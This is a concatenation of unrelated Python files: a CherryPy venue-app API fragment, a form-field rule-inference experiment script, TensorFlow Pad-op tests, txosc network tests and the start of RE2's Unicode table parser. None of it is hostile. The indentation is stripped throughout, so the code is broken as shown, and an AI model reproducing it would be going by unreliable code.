def set(self, cursor=None, user_id=None, venue_id=None, media_id=None,
**kwargs):
qry = {'insert_into': 'venue_shares',
'columns': ('user_id', 'venue_id', 'media_id', 'time')}
cursor.execute(util.query(**qry), (user_id, venue_id, media_id,
util.now()))
return True
class VenueStaff:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, staff_user_id=None, venue_id=None,
manager=None, promo_perm=None, delete=None, **kwargs):
if util.to_bool(delete):
qry = {'delete': 'venue_staff',
'where': ('user_id = ?', 'venue_id = ?')}
cursor.execute(util.query(**qry), (staff_user_id, venue_id))
qry = {'delete': 'venue_managers',
'where': ('user_id = ?', 'venue_id = ?')}
cursor.execute(util.query(**qry), (staff_user_id, venue_id))
elif util.to_bool(manager):
qry = {'select': 'id',
'table': 'venue_managers',
'where': ('user_id = ?', 'venue_id = ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (staff_user_id, venue_id))
res = cursor.fetchone()
if not res:
qry = {'delete': 'venue_staff',
'where': ('user_id = ?', 'venue_id = ?')}
cursor.execute(util.query(**qry), (staff_user_id, venue_id))
qry = {'insert_into': 'venue_managers',
'columns': ('user_id', 'venue_id', 'time')}
cursor.execute(util.query(**qry), (staff_user_id, venue_id,
util.now()))
else:
qry = {'select': 'id',
'table': 'venue_staff',
'where': ('user_id = ?', 'venue_id = ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (staff_user_id, venue_id))
res = cursor.fetchone()
if not res:
qry = {'delete': 'venue_managers',
'where': ('user_id = ?', 'venue_id = ?')}
cursor.execute(util.query(**qry), (staff_user_id, venue_id))
qry = {'insert_into': 'venue_staff',
'columns': ('user_id', 'venue_id', 'time',
'promo_perm')}
cursor.execute(util.query(**qry), (staff_user_id, venue_id,
util.now(),
1 if util.to_bool(promo_perm) else 0))
else:
qry = {'update': 'venue_staff',
'set_values': ('promo_perm'),
'where': ('user_id = ?', 'venue_id = ?')}
cursor.execute(util.query(**qry), (1 if util.to_bool(promo_perm) else 0,
staff_user_id, venue_id))
return True
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, venue_id=None, **kwargs):
nameqry = {'select': ('CONCAT(forename, \' \', surname)',),
'table': 'users'}
fbidqry = {'select': ('facebook_id',),
'table': 'users'}
nameqry['where'] = ('users.id = venue_staff.user_id',)
fbidqry['where'] = nameqry['where']
qry = {'select': ('id', 'user_id', 'promo_perm', 'time',
'(' + util.query(**nameqry) + ') AS name',
'(' + util.query(**fbidqry) + ') AS facebook_id'),
'table': 'venue_staff',
'where': 'venue_id = ?',
'order_by': 'time DESC'}
cursor.execute(util.query(**qry), (venue_id,))
staff = [util.row_to_dict(cursor, row) for row in cursor]
nameqry['where'] = ('users.id = venue_managers.user_id',)
fbidqry['where'] = nameqry['where']
qry = {'select': ('id', 'user_id', 'time',
'(' + util.query(**nameqry) + ') AS name',
'(' + util.query(**fbidqry) + ') AS facebook_id'),
'table': 'venue_managers',
'where': 'venue_id = ?',
'order_by': 'time DESC'}
cursor.execute(util.query(**qry), (venue_id,))
managers = [util.row_to_dict(cursor, row) for row in cursor]
return {'staff': staff, 'managers': managers}
class VenueView:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, venue_id=None, **kwargs):
qry = {'insert_into': 'venue_views',
'columns': ('user_id', 'venue_id', 'time')}
cursor.execute(util.query(**qry), (user_id, venue_id, util.now()))
return True
class ShnergleServer:
confirm = Confirm()
images = Image()
posts = Post()
post_likes = PostLike()
post_reports = PostReport()
post_shares = PostShare()
post_views = PostView()
promotions = Promotion()
promotion_redemptions = PromotionRedemption()
rankings = Ranking()
users = User()
venues = Venue()
venue_categories = VenueCategory()
venue_comments = VenueComment()
venue_followers = VenueFollower()
venue_managers = VenueManager()
venue_rsvps = VenueRsvp()
venue_shares = VenueShare()
venue_staff = VenueStaff()
venue_views = VenueView()
user_searches = UserSearch()
v2 = v2.main
def __init__(self):
self.v1 = self
@util.expose
def index(self):
return ''
@staticmethod
def error(status, message, traceback, version):
cherrypy.response.headers['Content-Type'] = 'application/json'
return json.dumps({'status': status,
'message': message,
'traceback': traceback},
separators=(',', ':'))
cherrypy.engine.subscribe('start_thread', util.connect)
current_dir = os.path.dirname(os.path.abspath(__file__))
cp_config = {'/': {'error_page.default': ShnergleServer.error},
'/favicon.ico': {'tools.staticfile.on': True,
'tools.staticfile.filename':
os.path.join(current_dir, 'favicon.ico')}}
app = cherrypy.Application(ShnergleServer(), '/', cp_config)
| |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Infer testing data with rules from training datapre
"""
import os, json, random
import numpy
from bs4 import BeautifulSoup
if __name__ == '__main__':
current_dir = os.path.dirname(__file__)
trial_dir = os.path.join(current_dir, 'trial')
input_dir = os.path.join(current_dir, 'corpus', 'all-input')
# preload all .input files into memory
inputs = dict()
for fname in os.listdir(input_dir):
key = fname.split('-')[0]
with open(os.path.join(input_dir, fname), 'r') as f:
data = json.load(f)
inputs[key] = data
dnames = [name for name in os.listdir(trial_dir) if os.path.isdir(os.path.join(trial_dir, name))]
for dname in dnames: # e.g. 10-training, 20-training, ...
print dname
'''
# for experiment 2 (easy-forms)
if dname != 'experiment2':
continue
'''
correction_rates = []
multiple_types = []
no_matches = []
program_rule_match_logs = list() # cache for log file
sub_dnames = [name for name in os.listdir(os.path.join(trial_dir, dname)) if os.path.isdir(os.path.join(trial_dir, dname, name))]
for sub_dname in sub_dnames: # e.g. trial-20160316-010033, trial-20160316-010035, ...
rule_match_logs = list() # cache for log file
print sub_dname
# load training and testing set
with open(os.path.join(trial_dir, dname, sub_dname, 'config.json'), 'r') as f:
config = json.load(f)
training_ids = list(config['training_ids'])
testing_ids = list(config['testing_ids'])
#print dname, sub_dname, training_ids
#raw_input()
# add rules from training data into rules
'''
e.g. rules = {
'fname': {
'name': ['first', 'fname'],
'id': ['first', 'fname'],
},
'email': {
'name': ['email'],
'id': ['email'],
'type': ['email']
}
}
'''
print 'Grab rules'
rules = dict()
for _id in training_ids:
#print _id
input_data = inputs[_id]
for item in input_data:
_type = item['type'] # e.g. 'fname'
if _type not in rules.keys():
rules[_type] = dict(item['rule'])
else:
for k, v in item['rule'].items():
if k in rules[_type].keys(): # e.g. 'id'
rules[_type][k] += [l for l in item['rule'][k] if l not in rules[_type][k]]
else:
rules[_type][k] = item['rule'][k]
'''
for k, v in rules.items():
print k
print v
#raw_input()
'''
rule_match_logs.append('Rules derived from training data:\n')
for k, v in rules.items():
rule_match_logs.append('Topic: %s, Rules: %s\n' % (k, v))
# test rules with training data
print 'Self-test rules'
num_training = 0
for _id in training_ids:
#print _id
input_data = inputs[_id]
for item in input_data:
soup = BeautifulSoup(item['dom'], 'html5lib')
_input = soup.find('input')
_types = set()
for k, v_dict in rules.items():
for attr, value_list in v_dict.items():
if attr in _input.attrs:
for value in value_list:
if value in _input[attr]:
'''
print _input
print attr
print _input[attr]
'''
_types.add(k)
break
assert item['type'] in _types # e.g. 'fname'
'''
if len(_types) > 1:
print _types
raw_input()
'''
num_training += 1
# infer testing data with rules
print 'Inferring'
num_testing = 0
num_incorrect = 0
num_no_match = 0
num_multiple_types = 0
for _id in testing_ids:
#print _id
rule_match_logs.append('Doc id: %s\n' % _id)
input_data = inputs[_id]
for item in input_data:
soup = BeautifulSoup(item['dom'], 'html5lib')
_input = soup.find('input')
_types = set()
for k, v_dict in rules.items():
for attr, value_list in v_dict.items():
if attr in _input.attrs:
for value in value_list:
if value in _input[attr]:
_types.add(k)
break
if not _types:
rule_match_logs.append('No Match. Type: %s\nDom: %s\nFeature: %s\n' %
(item['type'], item['dom'], item['feature']))
num_incorrect += 1
num_no_match += 1
elif len(_types) > 1:
rule_match_logs.append('Multiple candidate types: %s\n' % _types)
rule_match_logs.append('Type: %s\nDom: %s\nFeature: %s\n' % (item['type'], item['dom'], item['feature']))
num_multiple_types += 1
inferred_type = random.choice(list(_types))
if inferred_type != item['type']:
rule_match_logs.append('Wrong from multiple candidates: %s. Ans: %s\n' % (inferred_type, item['type']))
num_incorrect += 1
else: # len(_types) == 1
inferred_type = _types.pop()
if inferred_type != item['type']:
rule_match_logs.append('Wrong from single candidate: %s. Type: %s\nDom: %s\nFeature: %s\n' %
(inferred_type, item['type'], item['dom'], item['feature']))
num_incorrect += 1
num_testing += 1
assert num_training + num_testing == 985
# statistics
with open(os.path.join(trial_dir, dname, sub_dname, 'rule_match.log'), 'w') as f:
f.writelines(rule_match_logs)
f.write('## %s Summary ##\n' % sub_dname)
f.write('# of training data: %d\n' % num_training)
f.write('total inferred: %d\n' % num_testing)
f.write('# of multiple types: %d\n' % num_multiple_types)
f.write('correction rate: %d/%d (%f)\n' %
(num_testing-num_incorrect, num_testing, ((num_testing-num_incorrect)/float(num_testing))))
f.write('num_no_match: %d\n' % num_no_match)
program_rule_match_logs.append('## %s Summary ##\n' % sub_dname)
program_rule_match_logs.append('# of training data: %d\n' % num_training)
program_rule_match_logs.append('total inferred: %d\n' % num_testing)
program_rule_match_logs.append('# of multiple types: %d\n' % num_multiple_types)
program_rule_match_logs.append('correction rate: %d/%d (%f)\n' %
(num_testing-num_incorrect, num_testing, ((num_testing-num_incorrect)/float(num_testing))))
program_rule_match_logs.append('num_no_match: %d\n' % num_no_match)
correction_rates.append(((num_testing-num_incorrect)/float(num_testing)))
multiple_types.append(num_multiple_types)
no_matches.append(num_no_match)
with open(os.path.join(trial_dir, dname, 'program_rule_match.log'), 'w') as f:
f.writelines(program_rule_match_logs)
arr = numpy.array(correction_rates)
f.write('## %s Summary ##\n' % dname)
f.write('avg correction rate: %f\t' % numpy.mean(arr))
f.write('std: %f\t' % numpy.std(arr))
f.write('min: %f\t' % numpy.min(arr))
f.write('max: %f\n' % numpy.max(arr))
arr = numpy.array(multiple_types)
f.write('avg multiple_types: %f\t' % numpy.mean(arr))
f.write('std: %f\t' % numpy.std(arr))
f.write('min: %f\t' % numpy.min(arr))
f.write('max: %f\n' % numpy.max(arr))
arr = numpy.array(no_matches)
f.write('avg no_matches: %f\t' % numpy.mean(arr))
f.write('std: %f\t' % numpy.std(arr))
f.write('min: %f\t' % numpy.min(arr))
f.write('max: %f\n' % numpy.max(arr))
#raw_input(dname)
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.nn_ops.Pad."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.platform import test
class PadOpTest(test.TestCase):
def _npPad(self, inp, paddings, mode, constant_values=0):
mode = mode.lower()
if mode == "constant":
return np.pad(inp, paddings, mode=mode, constant_values=constant_values)
else:
return np.pad(inp, paddings, mode=mode)
def testNpPad(self):
self.assertAllEqual(
np.array([[0, 0, 0, 0, 0, 0],
[0, 3, 3, 0, 0, 0],
[0, 4, 4, 0, 0, 0],
[0, 5, 5, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]),
self._npPad(
np.array([[3, 3], [4, 4], [5, 5]]),
[[1, 2], [1, 3]],
mode="constant"))
self.assertAllEqual(
np.array([[1, 1, 1, 1, 1, 1],
[1, 3, 3, 1, 1, 1],
[1, 4, 4, 1, 1, 1],
[1, 5, 5, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]),
self._npPad(
np.array([[3, 3], [4, 4], [5, 5]]),
[[1, 2], [1, 3]],
mode="constant", constant_values=1))
self.assertAllEqual(
np.array([[4, 3, 4, 9, 4, 3],
[1, 0, 1, 2, 1, 0],
[4, 3, 4, 9, 4, 3],
[1, 0, 1, 2, 1, 0]]),
self._npPad(
np.array([[0, 1, 2], [3, 4, 9]]),
[[1, 1], [1, 2]],
mode="reflect"))
self.assertAllEqual(
np.array([[0, 0, 1, 2, 2, 1],
[0, 0, 1, 2, 2, 1],
[3, 3, 4, 9, 9, 4],
[3, 3, 4, 9, 9, 4]]),
self._npPad(
np.array([[0, 1, 2], [3, 4, 9]]),
[[1, 1], [1, 2]],
mode="symmetric"))
def _testPad(self, np_inputs, paddings, mode, constant_values):
np_val = self._npPad(np_inputs, paddings, mode=mode,
constant_values=constant_values)
with self.cached_session(use_gpu=True):
tf_val = array_ops.pad(np_inputs, paddings, mode=mode,
constant_values=constant_values)
out = tf_val.eval()
self.assertAllEqual(np_val, out)
self.assertShapeEqual(np_val, tf_val)
def _testGradient(self, x, a, mode, constant_values):
with self.cached_session(use_gpu=True):
inx = ops.convert_to_tensor(x)
xs = list(x.shape)
ina = ops.convert_to_tensor(a)
y = array_ops.pad(inx, ina, mode=mode, constant_values=constant_values)
# Expected y's shape to be:
ys = list(np.array(x.shape) + np.sum(np.array(a), axis=1))
jacob_t, jacob_n = gradient_checker.compute_gradient(
inx, xs, y, ys, x_init_value=x)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-5, atol=1e-5)
def _testAll(self, np_inputs, paddings, constant_values):
for mode in ("CONSTANT", "REFLECT", "SYMMETRIC", "reflect", "symmetric",
"constant"):
# Zero-sized input is not allowed for REFLECT mode, but we still want
# zero-sized input test cases for the other modes.
if np_inputs.size or mode.upper() != "REFLECT":
self._testPad(np_inputs, paddings, mode=mode,
constant_values=constant_values)
if np_inputs.dtype == np.float32:
self._testGradient(np_inputs, paddings, mode=mode,
constant_values=constant_values)
def testInputDims(self):
with self.session(use_gpu=True):
with self.assertRaises(ValueError):
array_ops.pad(array_ops.reshape(
[1, 2], shape=[1, 2, 1, 1, 1, 1]),
array_ops.reshape(
[1, 2], shape=[1, 2]))
def testPaddingsDim(self):
with self.session(use_gpu=True):
with self.assertRaises(ValueError):
array_ops.pad(array_ops.reshape(
[1, 2], shape=[1, 2]),
array_ops.reshape(
[1, 2], shape=[2]))
def testPaddingsDim2(self):
with self.session(use_gpu=True):
with self.assertRaises(ValueError):
array_ops.pad(array_ops.reshape(
[1, 2], shape=[1, 2]),
array_ops.reshape(
[1, 2], shape=[2, 1]))
def testPaddingsDim3(self):
with self.session(use_gpu=True):
with self.assertRaises(ValueError):
array_ops.pad(array_ops.reshape(
[1, 2], shape=[1, 2]),
array_ops.reshape(
[1, 2], shape=[1, 2]))
def testPaddingsDim4(self):
with self.session(use_gpu=True):
with self.assertRaises(ValueError):
array_ops.pad(array_ops.reshape(
[1, 2], shape=[1, 2]),
array_ops.reshape(
[1, 2, 3, 4, 5, 6], shape=[3, 2]))
def testPaddingsNonNegative(self):
with self.session(use_gpu=True):
with self.assertRaisesRegexp(ValueError, "must be non-negative"):
array_ops.pad(constant_op.constant(
[1], shape=[1]),
constant_op.constant(
[-1, 0], shape=[1, 2]))
def testPaddingsNonNegative2(self):
with self.session(use_gpu=True):
with self.assertRaisesRegexp(ValueError, "must be non-negative"):
array_ops.pad(constant_op.constant(
[1], shape=[1]),
constant_op.constant(
[-1, 0], shape=[1, 2]))
def testPaddingsMaximum(self):
with self.session(use_gpu=True):
with self.assertRaises(Exception):
array_ops.pad(constant_op.constant(
[1], shape=[2]),
constant_op.constant(
[2, 0], shape=[1, 2]),
mode="REFLECT").eval()
with self.assertRaises(Exception):
array_ops.pad(constant_op.constant(
[1], shape=[2]),
constant_op.constant(
[0, 3], shape=[1, 2]),
mode="SYMMETRIC").eval()
def testInvalid(self):
with self.cached_session():
x = [[1, 2, 3], [4, 5, 6]]
with self.assertRaisesRegexp(ValueError, "Unknown padding mode"):
array_ops.pad(x, [[1, 0], [2, 1]], mode="weird").eval()
def testPaddingTypes(self):
paddings = [[1, 0], [2, 3], [0, 2]]
inputs = np.random.randint(-100, 100, (4, 4, 3)).astype(np.float32)
for mode in ("CONSTANT", "REFLECT", "SYMMETRIC", "reflect", "symmetric",
"constant"):
for padding_dtype in [dtypes.int32, dtypes.int64]:
np_val = self._npPad(inputs,
paddings,
mode=mode,
constant_values=0)
with self.cached_session(use_gpu=True):
tf_val = array_ops.pad(inputs,
constant_op.constant(paddings, padding_dtype),
mode=mode,
constant_values=0)
out = tf_val.eval()
self.assertAllEqual(np_val, out)
self.assertShapeEqual(np_val, tf_val)
def testIntTypes(self):
# TODO(touts): Figure out why the padding tests do not work on GPU
# for int types and rank > 2.
for t in [np.int8, np.int32, np.int64]:
self._testAll(
np.random.randint(-100, 100, (4, 4, 3)).astype(t),
[[1, 0], [2, 3], [0, 2]], 0)
self._testAll(
np.random.randint(-100, 100, (4, 2, 1, 3)).astype(t),
[[0, 0], [0, 0], [0, 0], [0, 0]], -123)
def testFloatTypes(self):
for t in [np.float32, np.float64]:
self._testAll(np.random.rand(2, 5).astype(t), [[1, 0], [2, 0]], 0.0)
self._testAll(np.random.rand(2, 3, 4).astype(t),
[[0, 0], [0, 0], [0, 0]], -1234.0)
self._testAll(np.random.rand(0, 3, 4).astype(t),
[[0, 0], [2, 1], [2, 3]], 0.0)
def testComplexTypes(self):
for t in [np.complex64, np.complex128]:
x = np.random.rand(2, 5).astype(t)
self._testAll(x + 1j * x, [[1, 0], [2, 0]], 1234.0 - 1234.0j)
x = np.random.rand(3, 2, 1, 1).astype(t)
self._testAll(x + 1j * x, [[0, 0], [0, 0], [0, 0], [0, 0]], 0 + 0j)
def testString(self):
# Numpy does not support padding strings so we compare padding manually.
x = ops.convert_to_tensor([["Hello", "World"],
["Goodnight", "Moon"]])
constant = array_ops.pad(x, [[1, 0], [0, 1]], mode="CONSTANT",
constant_values="PAD")
reflect = array_ops.pad(x, [[1, 0], [0, 1]], mode="REFLECT",
constant_values="PAD")
symmetric = array_ops.pad(x, [[1, 0], [0, 1]], mode="SYMMETRIC",
constant_values="PAD")
with self.session(use_gpu=True):
self.assertAllEqual([[b"PAD", b"PAD", b"PAD"],
[b"Hello", b"World", b"PAD"],
[b"Goodnight", b"Moon", b"PAD"]], constant.eval())
self.assertAllEqual([[b"Goodnight", b"Moon", b"Goodnight"],
[b"Hello", b"World", b"Hello"],
[b"Goodnight", b"Moon", b"Goodnight"]],
reflect.eval())
self.assertAllEqual([[b"Hello", b"World", b"World"],
[b"Hello", b"World", b"World"],
[b"Goodnight", b"Moon", b"Moon"]], symmetric.eval())
def testShapeFunctionEdgeCases(self):
# Unknown paddings shape.
inp = constant_op.constant(0.0, shape=[4, 4, 4, 4])
padded = array_ops.pad(inp, array_ops.placeholder(dtypes.int32))
self.assertEqual([None, None, None, None], padded.get_shape().as_list())
# Unknown input shape.
inp = array_ops.placeholder(dtypes.float32)
padded = array_ops.pad(inp, [[2, 2], [2, 2]])
self.assertEqual([None, None], padded.get_shape().as_list())
# Unknown input and paddings shape.
inp = array_ops.placeholder(dtypes.float32)
padded = array_ops.pad(inp, array_ops.placeholder(dtypes.int32))
self.assertAllEqual(None, padded.get_shape().ndims)
def testPartialShapeInformation(self):
unknown = array_ops.placeholder(dtypes.int32)
# Known input shape, partial unknown padding (one dimension).
inp = constant_op.constant(0.0, shape=[4, 4])
padded = array_ops.pad(inp, [[1, 2], unknown])
self.assertEqual([7, None], padded.get_shape().as_list())
# Known input shape, partial unknown padding (begin).
inp = constant_op.constant(0.0, shape=[4, 4])
padded = array_ops.pad(inp, [[unknown, 0], [1, 2]])
self.assertEqual([None, 7], padded.get_shape().as_list())
# Known input shape, partial unknown padding (end).
inp = constant_op.constant(0.0, shape=[4, 4])
padded = array_ops.pad(inp, [[1, 2], [0, unknown]])
self.assertEqual([7, None], padded.get_shape().as_list())
# Unknown input shape, partial unknown padding (one dimension).
padded = array_ops.pad(unknown, [[1, 2], unknown])
self.assertEqual([None, None], padded.get_shape().as_list())
# Unknown input shape (rank known), partial unknown padding (one dimension).
rank_known = array_ops.placeholder(dtypes.int32)
rank_known.set_shape([None, None])
padded = array_ops.pad(rank_known, [[1, 2], unknown])
self.assertEqual([None, None], padded.get_shape().as_list())
# Known input shape, partial unknown padding (begin), with constant begin.
inp = constant_op.constant(0.0, shape=[4, 4])
padded = array_ops.pad(inp, [[constant_op.constant(1, shape=[]), 2],
[0, unknown]])
self.assertEqual([7, None], padded.get_shape().as_list())
# Known input shape, partial unknown padding (begin), with constant dim.
inp = constant_op.constant(0.0, shape=[4, 4])
padded = array_ops.pad(inp,
[constant_op.constant(1, shape=[2]), [0, unknown]])
self.assertEqual([6, None], padded.get_shape().as_list())
# Zero padding on a known dimension.
inp = array_ops.placeholder(dtypes.int32, [None, None, 20])
padded = array_ops.pad(inp, [[0, 0], [0, unknown], [0, 0]])
self.assertEqual([None, None, 20], padded.get_shape().as_list())
def testScalars(self):
paddings = np.zeros((0, 2), dtype=np.int32)
inp = np.asarray(7)
with self.session(use_gpu=True):
tf_val = array_ops.pad(inp, paddings)
out = tf_val.eval()
self.assertAllEqual(inp, out)
self.assertShapeEqual(inp, tf_val)
def testPadTypes(self):
for dtype in [dtypes.int32, dtypes.int64]:
paddings = np.zeros((0, 2))
inp = np.asarray(7)
with self.cached_session(use_gpu=True):
tf_val = array_ops.pad(inp, constant_op.constant(paddings, dtype=dtype))
out = tf_val.eval()
self.assertAllEqual(inp, out)
self.assertShapeEqual(inp, tf_val)
def testCollapseAdjacentNonPaddedDimensions(self):
# pyformat: disable
paddings_values = [[[0, 0], [0, 0], [0, 0], [0, 1]],
[[0, 0], [2, 3], [0, 0], [0, 0]],
[[0, 0], [0, 0], [0, 0], [0, 0]]]
# pyformat: enable
for paddings_value in paddings_values:
for dtype in [dtypes.float32, dtypes.int32]:
inp = constant_op.constant(1, shape=[8, 28, 28, 3], dtype=dtype)
paddings = constant_op.constant(paddings_value, dtype=dtypes.int32)
padded = array_ops.pad(inp, paddings)
middle = array_ops.slice(padded, [row[0] for row in paddings_value],
[dim.value for dim in inp.shape.dims])
left = array_ops.slice(padded, [0, 0, 0, 0],
[row[0] for row in paddings_value])
right = array_ops.slice(
padded,
[paddings_value[i][0] + inp.shape.dims[i].value for i in range(4)],
[-1, -1, -1, -1])
with self.cached_session(use_gpu=True):
self.assertAllEqual(inp.eval(), middle.eval())
self.assertAllEqual(
np.zeros([row[0] for row in paddings_value]), left.eval())
self.assertAllEqual(
np.zeros([row[1] for row in paddings_value]), right.eval())
if __name__ == "__main__":
test.main()
| |
# Copyright (c) 2009 Alexandre Quessy, Arjan Scherpenisse
# See LICENSE for details.
"""
Tests for txosc/async.py
Maintainer: Arjan Scherpenisse
"""
from twisted.trial import unittest
from twisted.internet import reactor, defer, task
from txosc import osc
from txosc import async
from txosc import dispatch
class ClientServerTests(object):
"""
Common class for the L{TestUDPClientServer} and
L{TestTCPClientServer} for shared test functions.
"""
def testSingleMessage(self):
pingMsg = osc.Message("/ping")
d = defer.Deferred()
def ping(m, addr):
self.assertEquals(m, pingMsg)
d.callback(True)
self.receiver.addCallback("/ping", ping)
self._send(pingMsg)
return d
def testBundle(self):
pingMsg = osc.Message("/ping")
bundle = osc.Bundle()
bundle.add(osc.Message("/pong"))
bundle.add(pingMsg)
bundle.add(osc.Message("/foo/bar", 1, 2))
d = defer.Deferred()
def ping(m, addr):
self.assertEquals(m, pingMsg)
d.callback(True)
d2 = defer.Deferred()
def foo(m, addr):
self.assertEquals(m, osc.Message("/foo/bar", 1, 2))
d2.callback(True)
self.receiver.addCallback("/ping", ping)
self.receiver.addCallback("/foo/*", foo)
self._send(bundle)
return defer.DeferredList([d, d2])
class TestUDPClientServer(unittest.TestCase, ClientServerTests):
"""
Test the L{osc.Sender} and L{dispatch.Receiver} over UDP via localhost.
"""
timeout = 1
def setUp(self):
self.receiver = dispatch.Receiver()
self.serverPort = reactor.listenUDP(17778, async.DatagramServerProtocol(self.receiver))
self.client = async.DatagramClientProtocol()
self.clientPort = reactor.listenUDP(0, self.client)
def tearDown(self):
return defer.DeferredList([self.serverPort.stopListening(), self.clientPort.stopListening()])
def _send(self, element):
self.client.send(element, ("127.0.0.1", 17778))
class TestMulticastClientServer(unittest.TestCase):
"""
Test the L{osc.Sender} and two L{dispatch.Receiver} over Multicast UDP via 224.0.0.1.
"""
timeout = 1
def setUp(self):
self.receiver = dispatch.Receiver()
self.serverPort = reactor.listenMulticast(17778, async.MulticastDatagramServerProtocol(self.receiver, "224.0.0.1"), listenMultiple=True)
self.receiver2 = dispatch.Receiver()
self.serverPort2 = reactor.listenMulticast(17778, async.MulticastDatagramServerProtocol(self.receiver2, "224.0.0.1"), listenMultiple=True)
self.client = async.DatagramClientProtocol()
self.clientPort = reactor.listenUDP(0, self.client)
def testSingleMessage(self):
pingMsg = osc.Message("/ping")
d = defer.Deferred()
d2 = defer.Deferred()
def ping(m, addr):
self.assertEquals(m, pingMsg)
d.callback(True)
def ping2(m, addr):
self.assertEquals(m, pingMsg)
d2.callback(True)
self.receiver.addCallback("/ping", ping)
self.receiver2.addCallback("/ping", ping2)
self._send(pingMsg)
return defer.DeferredList([d, d2])
def tearDown(self):
return defer.DeferredList([self.serverPort.stopListening(), self.serverPort2.stopListening(), self.clientPort.stopListening()])
def _send(self, element):
self.client.send(element, ("224.0.0.1", 17778))
class TestTCPClientServer(unittest.TestCase, ClientServerTests):
"""
Test the L{osc.Sender} and L{dispatch.Receiver} over UDP via localhost.
"""
timeout = 1
def setUp(self):
self.receiver = dispatch.Receiver()
self.serverPort = reactor.listenTCP(17778, async.ServerFactory(self.receiver))
self.client = async.ClientFactory()
self.clientPort = reactor.connectTCP("localhost", 17778, self.client)
return self.client.deferred
def tearDown(self):
self.clientPort.transport.loseConnection()
return defer.DeferredList([self.serverPort.stopListening()])
def _send(self, element):
self.client.send(element)
class TestReceiverWithExternalClient(unittest.TestCase):
"""
This test needs python-liblo.
"""
timeout = 1
def setUp(self):
self.receiver = dispatch.Receiver()
self.serverPort = reactor.listenUDP(17778, async.DatagramServerProtocol(self.receiver))
self.target = liblo.Address(17778)
def tearDown(self):
return defer.DeferredList([self.serverPort.stopListening()])
def testSingleMessage(self):
d = defer.Deferred()
def ping(m, addr):
self.assertEquals(m, osc.Message("/ping"))
d.callback(True)
self.receiver.addCallback("/ping", ping)
liblo.send(self.target, "/ping")
return d
def testBundle(self):
d = defer.Deferred()
d2 = defer.Deferred()
def ping(m, addr):
self.assertEquals(m, osc.Message("/ping"))
d.callback(True)
def pong(m, addr):
self.assertEquals(m, osc.Message("/pong", 1, 2, "string"))
d2.callback(True)
self.receiver.addCallback("/ping", ping)
self.receiver.addCallback("/po*", pong)
b = liblo.Bundle()
b.add("/ping")
b.add("/pong", 1, 2, "string")
liblo.send(self.target, b)
return defer.DeferredList([d, d2])
class TestClientWithExternalReceiver(unittest.TestCase):
"""
This test needs python-liblo.
"""
timeout = 1
def setUp(self):
self.client = async.DatagramClientProtocol()
self.clientPort = reactor.listenUDP(0, self.client)
def tearDown(self):
return defer.DeferredList([self.clientPort.stopListening()])
def _send(self, element):
self.client.send(element, ("127.0.0.1", 17778))
def testSingleMessage(self):
server = liblo.Server(17779)
server.start()
received = False
def ping_callback(path, args):
received = True
server.add_method("/ping", '', ping_callback)
self._send(osc.Message("/ping"))
while not received:
print 11
server.recv(100)
try:
import liblo
except ImportError:
TestReceiverWithExternalClient.skip = "pyliblo not installed"
TestClientWithExternalReceiver.skip = "FIXME: liblo server does not run with twisted"
#FIXME: yes it does. see rats.osc in Toonloop 1.2
| |
# Copyright 2008 The RE2 Authors. All Rights Reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Parser for Unicode data files (as distributed by unicode.org)."""
import os
import re
import urllib2
# Directory or URL where Unicode tables reside.
_UNICODE_DIR = "http://www.unicode.org/Public/8.0.0/ucd"
# Largest valid Unicode code value.
_RUNE_MAX = 0x10FFFF
class Error(Exception):
"""Unicode error base class."""
class InputError(Error):
"""Unicode input error class. Raised on invalid input."""
def _UInt(s):
"""Converts string to Unicode code point ('263A' => 0x263a).
Args:
s: string to convert
Returns:
Unicode code point
Raises:
InputError: the string is not a valid Unicode value.
"""
try:
v = int(s, 16)
except ValueError:
v = -1
if len(s) < 4 or len(s) > 6 or v < 0 or v > _RUNE_MAX:
raise InputError("invalid Unicode value %s" % (s,))
return v
def _URange(s):
"""Converts string to Unicode range.
'0001..0003' => [1, 2, 3].
'0001' => [1].
Args:
s: string to convert
Returns:
Unicode range
Raises:
InputError: the string is not a valid Unicode range.
"""
a = s.split("..")
if len(a) == 1:
return [_UInt(a[0])]
if len(a) == 2:
lo = _UInt(a[0])
hi = _UInt(a[1])
if lo < hi:
return range(lo, hi + 1)
raise InputError("invalid Unicode range %s" % (s,))
def _UStr(v):
"""Converts Unicode code point to hex string.
0x263a => '0x263A'.
Args:
v: code point to convert
Returns:
Unicode string
Raises:
InputError: the argument is not a valid Unicode value.
"""
if v < 0 or v > _RUNE_MAX:
raise InputError("invalid Unicode value %s" % (v,))
return "0x%04X" % (v,)
def _ParseContinue(s):
"""Parses a Unicode continuation field.
These are of the form '<Name, First>' or '<Name, Last>'.
Instead of giving an explicit range in a single table entry,
some Unicode tables use two entries, one for the first
code value in the range and one for the last.
The first entry's description is '<Name, First>' instead of 'Name'
and the second is '<Name, Last>'.
'<Name, First>' => ('Name', 'First')
'<Name, Last>' => ('Name', 'Last')
'Anything else' => ('Anything else', None)
Args:
s: continuation field string
Returns:
pair: name and ('First', 'Last', or None)
"""
